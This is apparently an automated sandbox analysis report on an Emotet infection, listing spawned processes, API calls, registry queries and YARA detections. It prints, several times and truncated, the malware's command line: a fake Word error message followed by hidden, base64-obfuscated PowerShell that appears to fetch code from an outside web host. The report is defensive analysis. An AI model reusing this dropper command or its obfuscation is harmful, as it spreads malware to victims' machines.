                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qaqt\yasnhb.kgm',RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Hudb\deul.ebq',RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ohxf\pnwx.dib',RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jpux\rkm.xqv',RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Oxtv\rmjj.sjq',RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Pwzo\iducd.mjn',RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gfwk\bavnhqr.pvy',RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dbsb\hxixh.nee',RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yvvm\ving.mzt',RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Puve\yoqqjfh.eoi',RunDLL
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD IAAkAEUAMwBTAHkAIAAgAD0AIABbAFQAWQBQAEUAXQAoACIAewA0AH0AewAzAH0AewAwAH0AewAxAH0AewA1AH0AewAyAH0AIgAtAGYAJwBNAC4ASQBvAC4ARAAnACwAJwBpAFIAZQAnACwAJwBUAE8AUgBZACcALAAnAFMAdABlACcALAAnAHMAeQAnACwAJwBDACcAKQAgADsAIAAgAFMAZQBUAC0ASQBUAEUATQAgAFYAQQBSAEkAYQBiAEwARQA6AGkANwBSAHAAVgB6ACAAIAAoAFsAVABZAFAARQBdACgAIgB7ADEAfQB7ADQAfQB7ADIAfQB7ADAAfQB7ADYAfQB7ADMAfQB7ADcAfQB7ADUAfQAiAC0AZgAgACcARQBUAC4AUwBlAFIAVgBpACcALAAnAFMAJwAsACcAVABFAG0ALgBOACcALAAnAEkATgBUACcALAAnAHkAUwAnACwAJwBBAG4AQQBnAEUAcgAnACwAJwBDAGUAUABvACcALAAnAE0AJwApACkAIAAgADsAJABYAHMAZQBqAGoAbwBvAD0AKAAnAE4AJwArACgAJwBhAHYAYwAnACsAJwBsAGcAJwApACsAJwB1ACcAKQA7ACQAUwBsAGYAcgAxAGcAcAA9ACQAUgBwAGIANQA2AHQANAAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAVQA5AG4AeQBiAGoAcwA7ACQAVwB3AHUAaABjAGYAcwA9ACgAKAAnAFUAXwBtACcAKwAnADQAawAnACkAKwAnAHAAcQAnACkAOwAgACAAKABnAEUAVAAtAHYAQQBSAEkAYQBCAGwAZQAgACAAZQAzAHMAWQAgAC0AdgBBAGwAVQBlAE8AbgAgACkAOgA6ACIAQwBSAGUAYQBUAEUARABpAHIAZQBgAGMAYABUAG8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAWQAnACsAJwBiACcAKwAnAHMAUgAnACsAKAAnAGcAMAA2ADQAJwArACcANgByAFkAYgBzACcAKwAnAFEAJwArACcAOQAnACkAKwAoACcAMAB4AG0AJwArACcAcgBxACcAKwAnAFkAYgAnACkAKwAnAHMAJwApACAAIAAtAFIARQBQAGwAYQBDAGUAIAAoACcAWQAnACsAJwBiAHMAJwApACwAWwBjAEgAQQByAF0AOQAyACkAKQA7ACQASwAzADAAOQBxAHcAMQA9ACgAKAAnAFIAcQAnACsAJwByAG0AJwApACsAKAAnAGIAMgAnACsAJwA4ACcAKQApADsAIAAoACAATABzACAAIAB2AGEAcgBpAEEAYgBsAGUAOgBpADcAcgBQAHYAWgAgACkALgB2AGEATABVAGUAOgA6ACIAUwBFAGMAVQByAGkAYABUAFkAcABSAG8AYABUAE8AYwBgAG8AbAAiACAAPQAgACgAKAAnAFQAbABzACcAKwAnADEAJwApACsAJwAyACcAKQA7ACQATgBtAGgAMQB3AG0AZgA9ACgAKAAnAFgAMwBiADYAJwArACcAZwAnACkAKwAnAGEAJwArACcAbwAnACkAOwAkAE8AagB6AF8AdwBhADcAIAA9ACAAKAAnAE0AJwArACgAJwA4AGoAawBsACcAKwAnAHYANAAnACkAKQA7ACQAWABnAHQAdwB6AGcAaAA9ACgAKAAnAEMAYwAnACsAJwBrADAAaAAnACkAKwAnADEANgAnACkAOwAkAFEAcQBhAHkAdQA2AGgAPQAoACcAQgAnACsAKAAnAGUANgAnACsAJwBmACcAKQArACgAJwByACcAKwAnAHcAMAAnACkAKQA7ACQASgBkAGcAegBhADUAbwA9ACQASABPAE0ARQArACgAKAAnAHsAMAAnACsAJwB9AFIAZwAwADYANAA2AHIAJwArACcAewAnACsAJwAwAH0AUQA5ADAAJwArACcAeABtAHIAcQB7ACcAKwAnADAAfQAnACkAIAAtAEYAIAAgAFsAQwBoAEEAUgBdADkAMgApACsAJABPAGoAegBfAHcAYQA3ACsAKAAoACcALgAnACsAJwBkAGwAJwApACsAJwBsACcAKQA7ACQATgAwADUAcQA1AHQANQA9ACgAJwBPACcAKwAoACcAXwAnACsAJwAzACcAKwAnAGUAMgBwAGYAJwApACkAOwAkAEcAawBoAG0AMQB0AGcAPQBuAGUAVwAtAE8AYgBgAGoAYABFAEMAVAAgAE4AZQBUAC4AVwBFAEIAQwBsAGkAZQBOAHQAOwAkAEoAawBkAHkAcwAwAG8APQAoACgAKAAoACcAaAB0ACcAKwAnAHQAJwArACcAcAA6AEoAJwArACcAKQAoADMAcwAyACkAJwApACkAKwAoACcAKAAnACsAJwBKACkAKAAzAHMAMgAnACsAJwApACcAKQArACgAKAAnACgAegBoACcAKwAnAG8AJwApACkAKwAoACcAbgBnAHMAJwArACcAaAAnACsAJwBpAHgAaQBuAGcAYwAnACsAJwBoAHUAYQAnACkAKwAoACcAbgAnACsAJwBnAC4AJwApACsAJwBjACcAKwAnAG8AbQAnACsAKAAoACcASgApACgAMwBzADIAJwArACcAKQAnACkAKQArACcAKAAnACsAJwB3AHAAJwArACgAJwAtACcAKwAnAGEAZABtAGkAbgBKACcAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnADMAcwAnACsAJwAyACkAJwApACkAKwAoACgAJwAoAE8AVABtAEoAJwArACcAKQAoACcAKwAnA
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEUAMwBTAHkAIAAgAD0AIABbAFQAWQBQAEUAXQAoACIAewA0AH0AewAzAH0AewAwAH0AewAxAH0AewA1AH0AewAyAH0AIgAtAGYAJwBNAC4ASQBvAC4ARAAnACwAJwBpAFIAZQAnACwAJwBUAE8AUgBZACcALAAnAFMAdABlACcALAAnAHMAeQAnACwAJwBDACcAKQAgADsAIAAgAFMAZQBUAC0ASQBUAEUATQAgAFYAQQBSAEkAYQBiAEwARQA6AGkANwBSAHAAVgB6ACAAIAAoAFsAVABZAFAARQBdACgAIgB7ADEAfQB7ADQAfQB7ADIAfQB7ADAAfQB7ADYAfQB7ADMAfQB7ADcAfQB7ADUAfQAiAC0AZgAgACcARQBUAC4AUwBlAFIAVgBpACcALAAnAFMAJwAsACcAVABFAG0ALgBOACcALAAnAEkATgBUACcALAAnAHkAUwAnACwAJwBBAG4AQQBnAEUAcgAnACwAJwBDAGUAUABvACcALAAnAE0AJwApACkAIAAgADsAJABYAHMAZQBqAGoAbwBvAD0AKAAnAE4AJwArACgAJwBhAHYAYwAnACsAJwBsAGcAJwApACsAJwB1ACcAKQA7ACQAUwBsAGYAcgAxAGcAcAA9ACQAUgBwAGIANQA2AHQANAAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAVQA5AG4AeQBiAGoAcwA7ACQAVwB3AHUAaABjAGYAcwA9ACgAKAAnAFUAXwBtACcAKwAnADQAawAnACkAKwAnAHAAcQAnACkAOwAgACAAKABnAEUAVAAtAHYAQQBSAEkAYQBCAGwAZQAgACAAZQAzAHMAWQAgAC0AdgBBAGwAVQBlAE8AbgAgACkAOgA6ACIAQwBSAGUAYQBUAEUARABpAHIAZQBgAGMAYABUAG8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAWQAnACsAJwBiACcAKwAnAHMAUgAnACsAKAAnAGcAMAA2ADQAJwArACcANgByAFkAYgBzACcAKwAnAFEAJwArACcAOQAnACkAKwAoACcAMAB4AG0AJwArACcAcgBxACcAKwAnAFkAYgAnACkAKwAnAHMAJwApACAAIAAtAFIARQBQAGwAYQBDAGUAIAAoACcAWQAnACsAJwBiAHMAJwApACwAWwBjAEgAQQByAF0AOQAyACkAKQA7ACQASwAzADAAOQBxAHcAMQA9ACgAKAAnAFIAcQAnACsAJwByAG0AJwApACsAKAAnAGIAMgAnACsAJwA4ACcAKQApADsAIAAoACAATABzACAAIAB2AGEAcgBpAEEAYgBsAGUAOgBpADcAcgBQAHYAWgAgACkALgB2AGEATABVAGUAOgA6ACIAUwBFAGMAVQByAGkAYABUAFkAcABSAG8AYABUAE8AYwBgAG8AbAAiACAAPQAgACgAKAAnAFQAbABzACcAKwAnADEAJwApACsAJwAyACcAKQA7ACQATgBtAGgAMQB3AG0AZgA9ACgAKAAnAFgAMwBiADYAJwArACcAZwAnACkAKwAnAGEAJwArACcAbwAnACkAOwAkAE8AagB6AF8AdwBhADcAIAA9ACAAKAAnAE0AJwArACgAJwA4AGoAawBsACcAKwAnAHYANAAnACkAKQA7ACQAWABnAHQAdwB6AGcAaAA9ACgAKAAnAEMAYwAnACsAJwBrADAAaAAnACkAKwAnADEANgAnACkAOwAkAFEAcQBhAHkAdQA2AGgAPQAoACcAQgAnACsAKAAnAGUANgAnACsAJwBmACcAKQArACgAJwByACcAKwAnAHcAMAAnACkAKQA7ACQASgBkAGcAegBhADUAbwA9ACQASABPAE0ARQArACgAKAAnAHsAMAAnACsAJwB9AFIAZwAwADYANAA2AHIAJwArACcAewAnACsAJwAwAH0AUQA5ADAAJwArACcAeABtAHIAcQB7ACcAKwAnADAAfQAnACkAIAAtAEYAIAAgAFsAQwBoAEEAUgBdADkAMgApACsAJABPAGoAegBfAHcAYQA3ACsAKAAoACcALgAnACsAJwBkAGwAJwApACsAJwBsACcAKQA7ACQATgAwADUAcQA1AHQANQA9ACgAJwBPACcAKwAoACcAXwAnACsAJwAzACcAKwAnAGUAMgBwAGYAJwApACkAOwAkAEcAawBoAG0AMQB0AGcAPQBuAGUAVwAtAE8AYgBgAGoAYABFAEMAVAAgAE4AZQBUAC4AVwBFAEIAQwBsAGkAZQBOAHQAOwAkAEoAawBkAHkAcwAwAG8APQAoACgAKAAoACcAaAB0ACcAKwAnAHQAJwArACcAcAA6AEoAJwArACcAKQAoADMAcwAyACkAJwApACkAKwAoACcAKAAnACsAJwBKACkAKAAzAHMAMgAnACsAJwApACcAKQArACgAKAAnACgAegBoACcAKwAnAG8AJwApACkAKwAoACcAbgBnAHMAJwArACcAaAAnACsAJwBpAHgAaQBuAGcAYwAnACsAJwBoAHUAYQAnACkAKwAoACcAbgAnACsAJwBnAC4AJwApACsAJwBjACcAKwAnAG8AbQAnACsAKAAoACcASgApACgAMwBzADIAJwArACcAKQAnACkAKQArACcAKAAnACsAJwB3AHAAJwArACgAJwAtACcAKwAnAGEAZABtAGkAbgBKACcAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnADMAcwAnACsAJwAyACkAJwApACkAKwAoACgAJwAoAE8AVABtAEoAJwArACcAKQAoACcAKwAnADMAcwAnACsAJwAyACkAKABAACcAKQApACsAKAAnAGgAdAAnACsAJwB0ACcAK
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEUAMwBTAHkAIAAgAD0AIABbAFQAWQBQAEUAXQAoACIAewA0AH0AewAzAH0AewAwAH0AewAxAH0AewA1AH0AewAyAH0AIgAtAGYAJwBNAC4ASQBvAC4ARAAnACwAJwBpAFIAZQAnACwAJwBUAE8AUgBZACcALAAnAFMAdABlACcALAAnAHMAeQAnACwAJwBDACcAKQAgADsAIAAgAFMAZQBUAC0ASQBUAEUATQAgAFYAQQBSAEkAYQBiAEwARQA6AGkANwBSAHAAVgB6ACAAIAAoAFsAVABZAFAARQBdACgAIgB7ADEAfQB7ADQAfQB7ADIAfQB7ADAAfQB7ADYAfQB7ADMAfQB7ADcAfQB7ADUAfQAiAC0AZgAgACcARQBUAC4AUwBlAFIAVgBpACcALAAnAFMAJwAsACcAVABFAG0ALgBOACcALAAnAEkATgBUACcALAAnAHkAUwAnACwAJwBBAG4AQQBnAEUAcgAnACwAJwBDAGUAUABvACcALAAnAE0AJwApACkAIAAgADsAJABYAHMAZQBqAGoAbwBvAD0AKAAnAE4AJwArACgAJwBhAHYAYwAnACsAJwBsAGcAJwApACsAJwB1ACcAKQA7ACQAUwBsAGYAcgAxAGcAcAA9ACQAUgBwAGIANQA2AHQANAAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAVQA5AG4AeQBiAGoAcwA7ACQAVwB3AHUAaABjAGYAcwA9ACgAKAAnAFUAXwBtACcAKwAnADQAawAnACkAKwAnAHAAcQAnACkAOwAgACAAKABnAEUAVAAtAHYAQQBSAEkAYQBCAGwAZQAgACAAZQAzAHMAWQAgAC0AdgBBAGwAVQBlAE8AbgAgACkAOgA6ACIAQwBSAGUAYQBUAEUARABpAHIAZQBgAGMAYABUAG8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAWQAnACsAJwBiACcAKwAnAHMAUgAnACsAKAAnAGcAMAA2ADQAJwArACcANgByAFkAYgBzACcAKwAnAFEAJwArACcAOQAnACkAKwAoACcAMAB4AG0AJwArACcAcgBxACcAKwAnAFkAYgAnACkAKwAnAHMAJwApACAAIAAtAFIARQBQAGwAYQBDAGUAIAAoACcAWQAnACsAJwBiAHMAJwApACwAWwBjAEgAQQByAF0AOQAyACkAKQA7ACQASwAzADAAOQBxAHcAMQA9ACgAKAAnAFIAcQAnACsAJwByAG0AJwApACsAKAAnAGIAMgAnACsAJwA4ACcAKQApADsAIAAoACAATABzACAAIAB2AGEAcgBpAEEAYgBsAGUAOgBpADcAcgBQAHYAWgAgACkALgB2AGEATABVAGUAOgA6ACIAUwBFAGMAVQByAGkAYABUAFkAcABSAG8AYABUAE8AYwBgAG8AbAAiACAAPQAgACgAKAAnAFQAbABzACcAKwAnADEAJwApACsAJwAyACcAKQA7ACQATgBtAGgAMQB3AG0AZgA9ACgAKAAnAFgAMwBiADYAJwArACcAZwAnACkAKwAnAGEAJwArACcAbwAnACkAOwAkAE8AagB6AF8AdwBhADcAIAA9ACAAKAAnAE0AJwArACgAJwA4AGoAawBsACcAKwAnAHYANAAnACkAKQA7ACQAWABnAHQAdwB6AGcAaAA9ACgAKAAnAEMAYwAnACsAJwBrADAAaAAnACkAKwAnADEANgAnACkAOwAkAFEAcQBhAHkAdQA2AGgAPQAoACcAQgAnACsAKAAnAGUANgAnACsAJwBmACcAKQArACgAJwByACcAKwAnAHcAMAAnACkAKQA7ACQASgBkAGcAegBhADUAbwA9ACQASABPAE0ARQArACgAKAAnAHsAMAAnACsAJwB9AFIAZwAwADYANAA2AHIAJwArACcAewAnACsAJwAwAH0AUQA5ADAAJwArACcAeABtAHIAcQB7ACcAKwAnADAAfQAnACkAIAAtAEYAIAAgAFsAQwBoAEEAUgBdADkAMgApACsAJABPAGoAegBfAHcAYQA3ACsAKAAoACcALgAnACsAJwBkAGwAJwApACsAJwBsACcAKQA7ACQATgAwADUAcQA1AHQANQA9ACgAJwBPACcAKwAoACcAXwAnACsAJwAzACcAKwAnAGUAMgBwAGYAJwApACkAOwAkAEcAawBoAG0AMQB0AGcAPQBuAGUAVwAtAE8AYgBgAGoAYABFAEMAVAAgAE4AZQBUAC4AVwBFAEIAQwBsAGkAZQBOAHQAOwAkAEoAawBkAHkAcwAwAG8APQAoACgAKAAoACcAaAB0ACcAKwAnAHQAJwArACcAcAA6AEoAJwArACcAKQAoADMAcwAyACkAJwApACkAKwAoACcAKAAnACsAJwBKACkAKAAzAHMAMgAnACsAJwApACcAKQArACgAKAAnACgAegBoACcAKwAnAG8AJwApACkAKwAoACcAbgBnAHMAJwArACcAaAAnACsAJwBpAHgAaQBuAGcAYwAnACsAJwBoAHUAYQAnACkAKwAoACcAbgAnACsAJwBnAC4AJwApACsAJwBjACcAKwAnAG8AbQAnACsAKAAoACcASgApACgAMwBzADIAJwArACcAKQAnACkAKQArACcAKAAnACsAJwB3AHAAJwArACgAJwAtACcAKwAnAGEAZABtAGkAbgBKACcAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnADMAcwAnACsAJwAyACkAJwApACkAKwAoACgAJwAoAE8AVABtAEoAJwArACcAKQAoACcAKwAnADMAcwAnACsAJwAyACkAKABAACcAKQApACsAKAAnAGgAdAAnACsAJwB0ACcAK
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: _LocaleUpdate::_LocaleUpdate,GetLocaleInfoW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,__alloca_probe_16,_malloc,GetLocaleInfoW,WideCharToMultiByte,GetLocaleInfoA,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,InterlockedDecrement,InterlockedDecrement,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,GetLocaleInfoA,GetACP,
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000E372 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected EmotetShow sources
                      Source: Yara matchFile source: 0000000D.00000002.2107396520.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2110398368.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.2116797461.0000000000241000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2096970876.00000000002C1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.2115599459.00000000001D1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000015.00000002.2117982629.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2109063945.0000000000200000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000002.2119357685.0000000000140000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000002.2119622142.0000000000221000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2111825774.00000000006B1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2106262075.0000000000190000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2099926310.00000000001F1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2096914563.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2101765881.0000000000380000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000002.2340256128.0000000000190000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.2116722634.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2114509777.0000000000220000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2106324425.00000000001B1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2107481721.0000000000271000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2102126340.00000000003A1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2109311078.00000000002C1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2098614058.0000000000690000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.2115515890.0000000000140000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2110449108.00000000001C1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000002.2340299348.0000000000231000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2111379658.0000000000150000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2104432048.0000000000211000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.2112781358.0000000000150000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.2113001666.0000000000231000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2098670665.00000000006B1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2114590514.00000000002A1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2099888213.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2104402194.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000015.00000002.2118123404.0000000000201000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 19.2.rundll32.exe.1d0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 22.2.rundll32.exe.140000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.2.rundll32.exe.190000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.2c0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 21.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.1b0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.190000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 21.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.270000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 21.2.rundll32.exe.200000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.190000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.3a0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.2.rundll32.exe.230000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.230000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
